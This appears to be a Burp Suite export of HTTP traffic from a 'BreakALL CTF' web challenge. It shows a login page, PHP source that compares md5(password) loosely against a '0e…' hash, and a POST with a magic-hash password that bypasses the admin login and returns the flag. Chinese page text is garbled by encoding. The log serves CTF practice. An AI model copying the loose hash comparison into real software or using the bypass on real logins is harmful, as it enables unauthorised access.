<?xml version="1.1"?>
<!-- NOTE: Any NULL bytes in requests and responses are preserved within this output, even though this strictly breaks the XML syntax. If your XML parser rejects the NULL bytes then you will need to remove or replace these bytes before parsing. Alternatively, you can use the option to base64-encode requests and responses. -->
<!DOCTYPE items [
<!ELEMENT items (item*)>
<!ATTLIST items burpVersion CDATA "">
<!ATTLIST items exportTime CDATA "">
<!ELEMENT item (time, url, host, port, protocol, method, path, extension, request, status, responselength, mimetype, response, comment)>
<!ELEMENT time (#PCDATA)>
<!ELEMENT url (#PCDATA)>
<!ELEMENT host (#PCDATA)>
<!ATTLIST host ip CDATA "">
<!ELEMENT port (#PCDATA)>
<!ELEMENT protocol (#PCDATA)>
<!ELEMENT method (#PCDATA)>
<!ELEMENT path (#PCDATA)>
<!ELEMENT extension (#PCDATA)>
<!ELEMENT request (#PCDATA)>
<!ATTLIST request base64 (true|false) "false">
<!ELEMENT status (#PCDATA)>
<!ELEMENT responselength (#PCDATA)>
<!ELEMENT mimetype (#PCDATA)>
<!ELEMENT response (#PCDATA)>
<!ATTLIST response base64 (true|false) "false">
<!ELEMENT comment (#PCDATA)>
]>
<items burpVersion="1.7.35" exportTime="Thu Dec 13 16:46:19 CST 2018">
  <item>
    <time>Thu Dec 13 16:45:17 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:3004/]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>3004</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET / HTTP/1.1
Host: 140.110.112.32:3004
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status>200</status>
    <responselength>300</responselength>
    <mimetype>XML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Thu, 13 Dec 2018 08:45:17 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Thu, 31 Aug 2017 15:23:58 GMT
ETag: "37-5580e3bb41f80"
Accept-Ranges: bytes
Content-Length: 55
Connection: close
Content-Type: text/html

<meta http-equiv="refresh" content="0;url=index.php" />]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Thu Dec 13 16:45:17 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:3004/index.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>3004</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/index.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[GET /index.php HTTP/1.1
Host: 140.110.112.32:3004
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:3004/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status>200</status>
    <responselength>1372</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Thu, 13 Dec 2018 08:45:17 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.22
Vary: Accept-Encoding
Content-Length: 1159
Connection: close
Content-Type: text/html

￯ﾻ﾿￯ﾻ﾿




<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="images/favicon.ico">

    <title>BreakALL CTF</title>

 
    <link href="css/bootstrap.min.css" rel="stylesheet">

    <link href="css/signin.css" rel="stylesheet">
  </head>

  <body>

    <div class="container">

      <form class="form-signin"  method="post" action="index.php">
        <h2 align="center">BreakALL CTF</h2>
		<h4 align="center"><a href="source.php" >￦ﾟﾥ￧ﾜﾋ￥ﾎﾟ￥ﾧﾋ￧ﾢﾼ</a></h4>
  
        <input type="text" id="inputUsername" class="form-control" name="username" placeholder="Username" >
        <input type="password" id="inputPassword" class="form-control" name="password" placeholder="Password">
		
        <button class="btn btn-lg btn-primary btn-block" type="submit">￧ﾙﾻ￥ﾅﾥ</button>
	
     




￯ﾻ﾿ 
			</form>
		</div> 
    <script src="js/ie10-viewport-bug-workaround.js"></script>
  </body>
</html>]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Thu Dec 13 16:45:21 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:3004/source.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>3004</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/source.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[GET /source.php HTTP/1.1
Host: 140.110.112.32:3004
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:3004/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status>200</status>
    <responselength>3131</responselength>
    <mimetype>XML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Thu, 13 Dec 2018 08:45:21 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.22
Vary: Accept-Encoding
Content-Length: 2918
Connection: close
Content-Type: text/html

￯ﾻ﾿<code><span style="color: #000000">
￯ﾻ﾿<span style="color: #0000BB">&lt;?php&nbsp;<br />show_source</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);&nbsp;<br /><br />include(</span><span style="color: #DD0000">"flag.php"</span><span style="color: #007700">);&nbsp;<br />&nbsp;<br />if&nbsp;((</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">"username"</span><span style="color: #007700">]&nbsp;!=&nbsp;</span><span style="color: #0000BB">null</span><span style="color: #007700">)&nbsp;and&nbsp;(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">"password"</span><span style="color: #007700">]&nbsp;!=&nbsp;</span><span style="color: #0000BB">null</span><span style="color: #007700">))&nbsp;<br />{<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$username&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">"username"</span><span style="color: #007700">];&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$password&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">"password"</span><span style="color: #007700">];&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(</span><span style="color: #0000BB">$username&nbsp;</span><span style="color: #007700">==&nbsp;</span><span style="color: #DD0000">'admin'&nbsp;</span><span style="color: #007700">and&nbsp;</span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">$password</span><span style="color: #007700">)&nbsp;==&nbsp;</span><span style="color: #DD0000">'0e342768415921451524974228454469'</span><span style="color: #007700">)&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;</span><span style="color: #0000BB">$message&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"￧ﾙﾻ￥ﾅﾥ￦ﾈﾐ￥ﾊﾟ!"</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;</span><span style="color: #0000BB">$flag</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;else<br />&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;</span><span style="color: #0000BB">$message&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"￧ﾙﾻ￥ﾅﾥ￥ﾤﾱ￦ﾕﾗ!"</span><span style="color: #007700">;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;}<br />}<br /></span><span style="color: #0000BB">?&gt;</span>&nbsp;</span>
</code>￯ﾻ﾿ ]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Thu Dec 13 16:45:42 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:3004/index.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>3004</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/index.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[POST /index.php HTTP/1.1
Host: 140.110.112.32:3004
Content-Length: 33
Cache-Control: max-age=0
Origin: http://140.110.112.32:3004
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:3004/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

username=admin&password=240610708]]></request>
    <status>200</status>
    <responselength>1489</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Thu, 13 Dec 2018 08:45:42 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.22
Vary: Accept-Encoding
Content-Length: 1276
Connection: close
Content-Type: text/html

￯ﾻ﾿￯ﾻ﾿




<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="images/favicon.ico">

    <title>BreakALL CTF</title>

 
    <link href="css/bootstrap.min.css" rel="stylesheet">

    <link href="css/signin.css" rel="stylesheet">
  </head>

  <body>

    <div class="container">

      <form class="form-signin"  method="post" action="index.php">
        <h2 align="center">BreakALL CTF</h2>
		<h4 align="center"><a href="source.php" >￦ﾟﾥ￧ﾜﾋ￥ﾎﾟ￥ﾧﾋ￧ﾢﾼ</a></h4>
  
        <input type="text" id="inputUsername" class="form-control" name="username" placeholder="Username" >
        <input type="password" id="inputPassword" class="form-control" name="password" placeholder="Password">
		
        <button class="btn btn-lg btn-primary btn-block" type="submit">￧ﾙﾻ￥ﾅﾥ</button>
	
     




￯ﾻ﾿<div class='alert alert-warning' align='center'><strong>￧ﾙﾻ￥ﾅﾥ￦ﾈﾐ￥ﾊﾟ!</strong></div>BreakALLCTF{CH82GiBlijFZbLqd1Y6V} 
			</form>
		</div> 
    <script src="js/ie10-viewport-bug-workaround.js"></script>
  </body>
</html>]]></response>
    <comment></comment>
  </item>
</items>
